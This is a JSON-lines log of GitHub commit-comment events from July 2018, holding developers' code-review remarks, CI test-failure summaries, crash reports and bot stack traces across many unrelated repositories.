{"id":"7985254758","type":"CommitCommentEvent","actor":{"login":"tiagomatana"},"repo":{"name":"ccem-dev/otus"},"payload":{"comment":{"id":29755383,"position":53,"line":53,"path":"otus/app/module/laboratory/business/participant/aliquot/aliquot-messages-service.js","commit_id":"7c090d5b7be5720e702f8d1420cf7edfa58017e0","created_at":"2018-07-18T20:22:08Z","updated_at":"2018-07-18T20:22:08Z","author_association":"MEMBER","body":"Concordo. Feito!"}},"created_at":"2018-07-18T20:22:08Z"}
{"id":"7985255868","type":"CommitCommentEvent","actor":{"login":"rajgthub"},"repo":{"name":"Seraphineyoung/group_research_node_class-4"},"payload":{"comment":{"id":29755385,"position":null,"line":null,"path":null,"commit_id":"efd03cab69ef7771722044b7052be96498c5c7c7","created_at":"2018-07-18T20:22:22Z","updated_at":"2018-07-18T20:22:22Z","author_association":"NONE","body":"You need to fetch to get new update $git pull origin master"}},"created_at":"2018-07-18T20:22:22Z"}
{"id":"7985292681","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29755464,"position":null,"line":null,"path":null,"commit_id":"3049276ae76d350b62a841abc11d20e053c2db67","created_at":"2018-07-18T20:29:53Z","updated_at":"2018-07-18T20:29:53Z","author_association":"NONE","body":"Follow-up-to-#6393-SZVAV-for-PTUnit (rraustad) - x86_64-MacOS-10.9-clang: Tests Failed (2363 of 2930 tests passed, 56 test warnings)\n\nMessages:\n\n * 623 tests had: EIO diffs.\n * 563 tests had: Table big diffs.\n * 169 tests had: ESO small diffs.\n * 1 test had: BND diffs.\n * 81 tests had: ESO big diffs.\n * 99 tests had: AUD diffs.\n * 99 tests had: MTR small diffs.\n * 40 tests had: MTR big diffs.\n * 19 tests had: ERR diffs.\n * 2 tests had: MTD diffs.\n * 1 test had: SSZ big diffs.\n * 1 test had: ZSZ big diffs.\n * 1 test had: Table small diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 56\n * Failed: 567\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3049276ae76d350b62a841abc11d20e053c2db67-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3049276ae76d350b62a841abc11d20e053c2db67-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-80.65%25-red.png)</a> \n"}},"created_at":"2018-07-18T20:29:53Z"}
{"id":"7985292674","type":"CommitCommentEvent","actor":{"login":"TheSharpReport"},"repo":{"name":"TheSharpReport/hello-world2"},"payload":{"comment":{"id":29755465,"position":null,"line":null,"path":null,"commit_id":"8c489eea12c93a8897a1b9b602eff2a2941dc00f","created_at":"2018-07-18T20:29:54Z","updated_at":"2018-07-18T20:29:54Z","author_association":"OWNER","body":"Update master with html file."}},"created_at":"2018-07-18T20:29:54Z"}
{"id":"7985297872","type":"CommitCommentEvent","actor":{"login":"deveee"},"repo":{"name":"supertuxkart/stk-code"},"payload":{"comment":{"id":29755478,"position":null,"line":null,"path":null,"commit_id":"d14916dec2642140d9381af01333a703c903ec02","created_at":"2018-07-18T20:30:46Z","updated_at":"2018-07-18T20:30:46Z","author_association":"MEMBER","body":"Screenshot of the day:\r\n![screenshot_2018-07-18-22-17-52](https://user-images.githubusercontent.com/5108558/42905809-60b2eaf4-8ad9-11e8-9cea-1d25362f6805.png)\r\n\r\nIt happened when I tried to run soccer mode with networking, before kart selection screen was displayed. I'm not sure if it was someone else's game or it was just controlled by AI, because it crashed after a while.\r\n\r\nAnd btw. debug build fails with\r\n```\r\nsupertuxkart: /home/Dokumenty/programowanie/supertuxkart/supertuxkart-git/src/network/game_setup.hpp:145: bool GameSetup::isSoccerGoalTarget() const: Assertion `hasExtraSeverInfo()' failed.\r\n```\r\n\r\nSoccer server should work now, you can look if you can connect from your android."}},"created_at":"2018-07-18T20:30:46Z"}
{"id":"7985300149","type":"CommitCommentEvent","actor":{"login":"shiftrtech"},"repo":{"name":"shiftrtech/mailinblue"},"payload":{"comment":{"id":29755483,"position":null,"line":null,"path":null,"commit_id":"6c6fbb3eabc88d2644b60d192024316a809d1b50","created_at":"2018-07-18T20:31:12Z","updated_at":"2018-07-18T20:31:12Z","author_association":"OWNER","body":"Created multidev environment [mailinblue#ci-17](https://dashboard.pantheon.io/sites/7c88439c-0f59-4679-be2f-1f02e1043d37#ci-17).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-17-mailinblue.pantheonsite.io/)"}},"created_at":"2018-07-18T20:31:12Z"}
{"id":"7985301223","type":"CommitCommentEvent","actor":{"login":"jacobq"},"repo":{"name":"felixrieseberg/ember-electron"},"payload":{"comment":{"id":29755488,"position":null,"line":null,"path":null,"commit_id":"938d1bd700690c601826dafe3b9986b56125d114","created_at":"2018-07-18T20:31:25Z","updated_at":"2018-07-18T20:31:25Z","author_association":"CONTRIBUTOR","body":"Ug, I don't know how this made it past the tests, but when I update my `testem-electron.js` file in my project to match this it breaks. \r\n\r\n```\r\nBuilt and assembled Electron project successfully. Stored in \"/path/to/app/tmp/class-tests_dist-kSoha5LW.tmp\".\r\nnot ok 1 Chrome - error\r\n    ---\r\n        message: >\r\n            Error: Browser failed to connect within 30s. testem.js not loaded?\r\n            Stderr: \r\n             [0718/153012.031822:ERROR:gpu_process_transport_factory.cc(1017)] Lost UI shared context.\r\n            \r\n            DevTools listening on ws://127.0.0.1:44055/devtools/browser/98547368-c2c8-4327-bc90-8bbabd8f1ced\r\n            Fontconfig warning: \"/etc/fonts/fonts.conf\", line 160: blank doesn't take any effect anymore. please remove it from your fonts.conf\r\n            \r\n            \r\n        Log: |\r\n            { type: 'error',\r\n              text:\r\n               'Error: Browser failed to connect within 30s. testem.js not loaded?' }\r\n            { type: 'error',\r\n              text:\r\n               '[0718/153012.031822:ERROR:gpu_process_transport_factory.cc(1017)] Lost UI shared context.\\n\\nDevTools listening on ws://127.0.0.1:44055/devtools/browser/98547368-c2c8-4327-bc90-8bbabd8f1ced\\nFontconfig warning: \"/etc/fonts/fonts.conf\", line 160: blank doesn\\'t take any effect anymore. please remove it from your fonts.conf\\n' }\r\n    ...\r\n\r\n1..1\r\n# tests 1\r\n# pass  0\r\n# skip  0\r\n# fail  1\r\nTestem finished with non-zero exit code. Tests failed.\r\n```"}},"created_at":"2018-07-18T20:31:25Z"}
{"id":"7985302151","type":"CommitCommentEvent","actor":{"login":"loganblevins"},"repo":{"name":"aosp-mirror/platform_packages_providers_downloadprovider"},"payload":{"comment":{"id":29755490,"position":null,"line":null,"path":null,"commit_id":"26c68db9ccf1983f5d6e8a734f8ffccea3849f10","created_at":"2018-07-18T20:31:37Z","updated_at":"2018-07-18T20:31:37Z","author_association":"NONE","body":"This commit seems to have broken downloads while connected to the VPN Service interface. This is of extremely high severity, affects many users, and places many apps providing a VPN service completely in the mercy of Google to resolve this bug.\r\n\r\nHoping this comment is noticed and taken seriously. \r\n\r\nPlease refer to: https://issuetracker.google.com/u/1/issues/111574523 and https://issuetracker.google.com/u/1/issues/37105245 ."}},"created_at":"2018-07-18T20:31:37Z"}
{"id":"7985306181","type":"CommitCommentEvent","actor":{"login":"tdewolff"},"repo":{"name":"tdewolff/minify"},"payload":{"comment":{"id":29755502,"position":null,"line":null,"path":null,"commit_id":"835afedd1a7d95549ad735ed1c5ba3d357e21674","created_at":"2018-07-18T20:32:25Z","updated_at":"2018-07-18T20:32:25Z","author_association":"OWNER","body":"Fixed in https://github.com/tdewolff/parse/commit/cc8a3a32157a2c8c1ae2473098c94ad178b04b2c and https://github.com/tdewolff/minify/commit/1bb1eeadc7210a1e2929dfb75a53347c446965f6"}},"created_at":"2018-07-18T20:32:25Z"}
{"id":"7985312428","type":"CommitCommentEvent","actor":{"login":"mew-bot"},"repo":{"name":"MyEtherWallet/MyEtherWallet"},"payload":{"comment":{"id":29755514,"position":null,"line":null,"path":null,"commit_id":"01033d3099064c89474875a77af87bd0259c4048","created_at":"2018-07-18T20:33:40Z","updated_at":"2018-07-18T20:33:40Z","author_association":"NONE","body":"Copy of this build can be found at https://www.mewbuilds.com/build/01033d3099064c89474875a77af87bd0259c4048/index.html"}},"created_at":"2018-07-18T20:33:40Z"}
{"id":"7985313565","type":"CommitCommentEvent","actor":{"login":"mszywalska"},"repo":{"name":"mszywalska/Opole_GIT"},"payload":{"comment":{"id":29755518,"position":null,"line":null,"path":null,"commit_id":"8e5186a0154008dcdcec1554376fb79b2a0c71fb","created_at":"2018-07-18T20:33:54Z","updated_at":"2018-07-18T20:33:54Z","author_association":"OWNER","body":"Readme pullR"}},"created_at":"2018-07-18T20:33:54Z"}
{"id":"7985313966","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"proshin-roman/blog"},"payload":{"comment":{"id":29755519,"position":null,"line":null,"path":null,"commit_id":"0bf8ad71388a1cb76852315c5194f184584a66fb","created_at":"2018-07-18T20:33:59Z","updated_at":"2018-07-18T20:33:59Z","author_association":"NONE","body":"I wasn't able to retrieve PDD puzzles from the code base and submit them to GitHub. If you think that it's a bug on our side, please submit it to [yegor256/0pdd](https://github.com/yegor256/0pdd/issues):\n\n> no implicit conversion of String into Integer\n\n\nPlease, copy and paste this stack trace to GitHub:\n\n\n```\nTypeError\nno implicit conversion of String into Integer\n/app/objects/job.rb:39:in `dig'\n/app/objects/job.rb:39:in `proceed'\n/app/objects/job_starred.rb:33:in `proceed'\n/app/objects/job_recorded.rb:32:in `proceed'\n/app/objects/job_emailed.rb:35:in `proceed'\n/app/objects/job_commiterrors.rb:36:in `proceed'\n/app/objects/job_detached.rb:48:in `exclusive'\n/app/objects/job_detached.rb:36:in `block in proceed'\n/app/objects/job_detached.rb:36:in `fork'\n/app/objects/job_detached.rb:36:in `proceed'\n/app/0pdd.rb:342:in `block in <top (required)>'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1634:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1634:in `block in compile!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:992:in `block (3 levels) in route!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1011:in `route_eval'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:992:in `block (2 levels) in route!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1039:in `block in process_route'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1037:in `catch'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1037:in `process_route'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:990:in `block in route!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:989:in `each'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:989:in `route!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1096:in `block in dispatch!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `block in invoke'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `catch'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `invoke'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1093:in `dispatch!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:924:in `block in call!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `block in invoke'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `catch'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `invoke'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:924:in `call!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:913:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/xss_header.rb:18:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/path_traversal.rb:16:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/json_csrf.rb:26:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/base.rb:50:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/base.rb:50:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/frame_options.rb:31:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/logger.rb:15:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/common_logger.rb:33:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:231:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:224:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/head.rb:12:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/method_override.rb:22:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:194:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1957:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1501:in `block in call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1728:in `synchronize'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1501:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/handler/webrick.rb:86:in `service'\n/app/vendor/ruby-2.3.3/lib/ruby/2.3.0/webrick/httpserver.rb:140:in `service'\n/app/vendor/ruby-2.3.3/lib/ruby/2.3.0/webrick/httpserver.rb:96:in `run'\n/app/vendor/ruby-2.3.3/lib/ruby/2.3.0/webrick/server.rb:296:in `block in start_thread'\n```"}},"created_at":"2018-07-18T20:33:59Z"}
{"id":"7985323378","type":"CommitCommentEvent","actor":{"login":"jterry75"},"repo":{"name":"jterry75/moby"},"payload":{"comment":{"id":29755542,"position":null,"line":null,"path":null,"commit_id":"ccd325bc20942ba41e16a1a61b9e18ba67ef83b7","created_at":"2018-07-18T20:35:55Z","updated_at":"2018-07-18T20:35:55Z","author_association":"OWNER","body":"@jhowardmsft - Mind taking a quick look?"}},"created_at":"2018-07-18T20:35:55Z"}
{"id":"7985325727","type":"CommitCommentEvent","actor":{"login":"leobuitrago"},"repo":{"name":"tdwg/PlinianCore"},"payload":{"comment":{"id":29755545,"position":null,"line":null,"path":null,"commit_id":"f6c00432cc76bfc03505d144004cdca022c807cf","created_at":"2018-07-18T20:36:24Z","updated_at":"2018-07-18T20:36:24Z","author_association":"COLLABORATOR","body":"How affect this to PliC?. It´s just a web page access issue, or GSIN still exist in other instance (web site, repository, etc.)?"}},"created_at":"2018-07-18T20:36:24Z"}
{"id":"7985331812","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"proshin-roman/blog"},"payload":{"comment":{"id":29755555,"position":null,"line":null,"path":null,"commit_id":"a1681365e27a72e48537a1c107fe771a3a6ed1ad","created_at":"2018-07-18T20:37:39Z","updated_at":"2018-07-18T20:37:39Z","author_association":"NONE","body":"I wasn't able to retrieve PDD puzzles from the code base and submit them to GitHub. If you think that it's a bug on our side, please submit it to [yegor256/0pdd](https://github.com/yegor256/0pdd/issues):\n\n> no implicit conversion of String into Integer\n\n\nPlease, copy and paste this stack trace to GitHub:\n\n\n```\nTypeError\nno implicit conversion of String into Integer\n/app/objects/job.rb:39:in `dig'\n/app/objects/job.rb:39:in `proceed'\n/app/objects/job_starred.rb:33:in `proceed'\n/app/objects/job_recorded.rb:32:in `proceed'\n/app/objects/job_emailed.rb:35:in `proceed'\n/app/objects/job_commiterrors.rb:36:in `proceed'\n/app/objects/job_detached.rb:48:in `exclusive'\n/app/objects/job_detached.rb:36:in `block in proceed'\n/app/objects/job_detached.rb:36:in `fork'\n/app/objects/job_detached.rb:36:in `proceed'\n/app/0pdd.rb:342:in `block in <top (required)>'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1634:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1634:in `block in compile!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:992:in `block (3 levels) in route!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1011:in `route_eval'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:992:in `block (2 levels) in route!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1039:in `block in process_route'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1037:in `catch'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1037:in `process_route'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:990:in `block in route!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:989:in `each'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:989:in `route!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1096:in `block in dispatch!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `block in invoke'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `catch'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `invoke'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1093:in `dispatch!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:924:in `block in call!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `block in invoke'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `catch'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `invoke'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:924:in `call!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:913:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/xss_header.rb:18:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/path_traversal.rb:16:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/json_csrf.rb:26:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/base.rb:50:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/base.rb:50:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/frame_options.rb:31:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/logger.rb:15:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/common_logger.rb:33:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:231:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:224:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/head.rb:12:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/method_override.rb:22:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:194:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1957:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1501:in `block in call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1728:in `synchronize'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1501:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/handler/webrick.rb:86:in `service'\n/app/vendor/ruby-2.3.3/lib/ruby/2.3.0/webrick/httpserver.rb:140:in `service'\n/app/vendor/ruby-2.3.3/lib/ruby/2.3.0/webrick/httpserver.rb:96:in `run'\n/app/vendor/ruby-2.3.3/lib/ruby/2.3.0/webrick/server.rb:296:in `block in start_thread'\n```"}},"created_at":"2018-07-18T20:37:39Z"}
{"id":"7985336961","type":"CommitCommentEvent","actor":{"login":"tramyardg"},"repo":{"name":"tramyardg/angularjs-tut"},"payload":{"comment":{"id":29755562,"position":null,"line":null,"path":null,"commit_id":"dc0e5e454f8f9003b4429f7fe038de97d7ba078c","created_at":"2018-07-18T20:38:41Z","updated_at":"2018-07-18T20:38:41Z","author_association":"OWNER","body":"![image](https://user-images.githubusercontent.com/5623994/42906409-03ddd5bc-8aa9-11e8-9558-e8532fdabecf.png)\r\n"}},"created_at":"2018-07-18T20:38:41Z"}
{"id":"7985338612","type":"CommitCommentEvent","actor":{"login":"tghelere"},"repo":{"name":"renatonascalves/woocommerce-pagseguro"},"payload":{"comment":{"id":29755563,"position":null,"line":null,"path":null,"commit_id":"0617a42238bd8817372ee17f4f001558029dffe8","created_at":"2018-07-18T20:39:01Z","updated_at":"2018-07-18T20:39:01Z","author_association":"NONE","body":"Entendo, por este código ser de 2016 imagino que deva sofrer uma grande refatoração.\r\nNunca usei Woocommerce na verdade, nem sou muito familiar ao wordpress, mas uma migo está precisando desta funcionalidade. Também estou sem tempo, mas tenho intenção de dar continuidade a esta feature assim que possível. Até porque imagino que muitas pessoas usariam se estivesse funcionando.\r\nQuando tiver algo a oferecer (código hehe), lhe aviso.\r\nAbraço\r\n\r\n"}},"created_at":"2018-07-18T20:39:01Z"}
{"id":"7985346145","type":"CommitCommentEvent","actor":{"login":"Srinivas-Sathyanarayanan"},"repo":{"name":"Srinivas-Sathyanarayanan/blockChainLearnings"},"payload":{"comment":{"id":29755580,"position":48,"line":48,"path":"ProjSplitter/contracts/Splitter.sol","commit_id":"a7e96f8137a04248497b98d2eaf49f59d0639585","created_at":"2018-07-18T20:40:30Z","updated_at":"2018-07-18T20:40:30Z","author_association":"OWNER","body":"updated with onlyOwner modifier"}},"created_at":"2018-07-18T20:40:30Z"}
{"id":"7985346594","type":"CommitCommentEvent","actor":{"login":"exyi"},"repo":{"name":"riganti/dotvvm"},"payload":{"comment":{"id":29755581,"position":54,"line":1075,"path":"src/DotVVM.Framework/Resources/Scripts/DotVVM.ts","commit_id":"3f4fb5acbe8b943317bedf9bf105664cdd2b026a","created_at":"2018-07-18T20:40:36Z","updated_at":"2018-07-18T20:40:36Z","author_association":"CONTRIBUTOR","body":"Maybe, I don't really know why the check was there, it would make sense for any element... Except that you can't disable any element :P https://www.w3.org/TR/html52/sec-forms.html#enabling-and-disabling-form-controls-the-disabled-attribute. The `disabled` is only specified for form controls, like button or input. It is also specified for `formgroup` and it should disable the entire subtree, which is clearly not reflected by this method. IMHO we should get rid of (mis)using the `disabled` attribute for this purpose. I think that adding the postback handler expliciltly to the affected postback during rendering would be more apropriate."}},"created_at":"2018-07-18T20:40:36Z"}
{"id":"7985354883","type":"CommitCommentEvent","actor":{"login":"evgenpatrushev"},"repo":{"name":"vovapasko/Crypto_fuignya"},"payload":{"comment":{"id":29755589,"position":27,"line":66,"path":"DBConnector.py","commit_id":"7851c6d70dd099b92f4489e1e0ce48a943edd742","created_at":"2018-07-18T20:42:17Z","updated_at":"2018-07-18T20:42:17Z","author_association":"COLLABORATOR","body":"Вова, орни с этого потому что позже я эту уберу с еще одним куском кода) "}},"created_at":"2018-07-18T20:42:17Z"}
{"id":"7985356302","type":"CommitCommentEvent","actor":{"login":"diracdeltas"},"repo":{"name":"brave-intl/bat-go"},"payload":{"comment":{"id":29755592,"position":19,"line":19,"path":"utils/passphrase/passphrase.go","commit_id":"ab0ec7f6a7092cbabbe19e8251c509c1e95281fe","created_at":"2018-07-18T20:42:33Z","updated_at":"2018-07-18T20:42:33Z","author_association":"NONE","body":"sgtm"}},"created_at":"2018-07-18T20:42:33Z"}
{"id":"7985356513","type":"CommitCommentEvent","actor":{"login":"EdwardBetts"},"repo":{"name":"pytest-dev/pytest"},"payload":{"comment":{"id":29755593,"position":null,"line":null,"path":null,"commit_id":"fbc45be83f279f936121355649728f7aeec6e6a6","created_at":"2018-07-18T20:42:36Z","updated_at":"2018-07-18T20:42:36Z","author_association":"NONE","body":"I think this change is causing test failures in pytest-sugar: Frozenball/pytest-sugar#134"}},"created_at":"2018-07-18T20:42:36Z"}
{"id":"7985371030","type":"CommitCommentEvent","actor":{"login":"Jameson13B"},"repo":{"name":"Jameson13B/front-end-project-week"},"payload":{"comment":{"id":29755629,"position":null,"line":null,"path":null,"commit_id":"d6f5f55d01169e8f500c335f2c5762cd188e4b5e","created_at":"2018-07-18T20:45:31Z","updated_at":"2018-07-18T20:45:31Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Wire up your static React App to our Notes API.](https://trello.com/c/8ZXeYcd6/9-wire-up-your-static-react-app-to-our-notes-api)"}},"created_at":"2018-07-18T20:45:31Z"}
{"id":"7985375262","type":"CommitCommentEvent","actor":{"login":"xavierhardy"},"repo":{"name":"xavierhardy/netmiko"},"payload":{"comment":{"id":29755636,"position":null,"line":null,"path":null,"commit_id":"72722d93101f8c75654e27419701e8ef6a6cd507","created_at":"2018-07-18T20:46:23Z","updated_at":"2018-07-18T20:46:23Z","author_association":"OWNER","body":"A warning though, it has broken some of my tests on Linux. I suggest we spend some more time on it to avoid breaking the netmiko API. It would be nice to have this as a drop-in replacement."}},"created_at":"2018-07-18T20:46:23Z"}
{"id":"7985377683","type":"CommitCommentEvent","actor":{"login":"deveee"},"repo":{"name":"supertuxkart/stk-code"},"payload":{"comment":{"id":29755644,"position":null,"line":null,"path":null,"commit_id":"d14916dec2642140d9381af01333a703c903ec02","created_at":"2018-07-18T20:46:52Z","updated_at":"2018-07-18T20:46:52Z","author_association":"MEMBER","body":"It saved a thombstone for this crash, but probably nothing useful. It just crashed in ModelViewWidget.\r\n[tombstone_08.txt](https://github.com/supertuxkart/stk-code/files/2207314/tombstone_08.txt)\r\n"}},"created_at":"2018-07-18T20:46:52Z"}
{"id":"7985383401","type":"CommitCommentEvent","actor":{"login":"dedChar"},"repo":{"name":"Shroompow/DedShroom"},"payload":{"comment":{"id":29755654,"position":null,"line":null,"path":null,"commit_id":"d53d9531df78ea545540b880e5339872a104ab09","created_at":"2018-07-18T20:47:57Z","updated_at":"2018-07-18T20:47:57Z","author_association":"COLLABORATOR","body":"why the loadConfig command instead of a `require('config.json')`?"}},"created_at":"2018-07-18T20:47:57Z"}
{"id":"7985384627","type":"CommitCommentEvent","actor":{"login":"falmotlag"},"repo":{"name":"p4paul/chef-perforce"},"payload":{"comment":{"id":29755658,"position":null,"line":null,"path":null,"commit_id":"d57e636405d3055153984280bf36994c5e2b36a9","created_at":"2018-07-18T20:48:12Z","updated_at":"2018-07-18T20:48:12Z","author_association":"NONE","body":"r16.1 is no longer available on perforce filehost server."}},"created_at":"2018-07-18T20:48:12Z"}
{"id":"7985384747","type":"CommitCommentEvent","actor":{"login":"Donskelle"},"repo":{"name":"PolymerElements/iron-icon"},"payload":{"comment":{"id":29755659,"position":null,"line":null,"path":null,"commit_id":"767f3e9e18d50958270db08220f490cd0787fd2d","created_at":"2018-07-18T20:48:13Z","updated_at":"2018-07-18T20:48:13Z","author_association":"NONE","body":"Update README.md: added published icon"}},"created_at":"2018-07-18T20:48:13Z"}
{"id":"7985384853","type":"CommitCommentEvent","actor":{"login":"kirkshoop"},"repo":{"name":"LeeHowes/pushmi"},"payload":{"comment":{"id":29755660,"position":69,"line":213,"path":"include/pushmi/o/async.h","commit_id":"a237a5558345e1f8fda2ceb55e3352a834784abe","created_at":"2018-07-18T20:48:15Z","updated_at":"2018-07-18T20:48:15Z","author_association":"NONE","body":"missing submit? I think that this runs func on an arbitrary thread rather than the executor.."}},"created_at":"2018-07-18T20:48:15Z"}
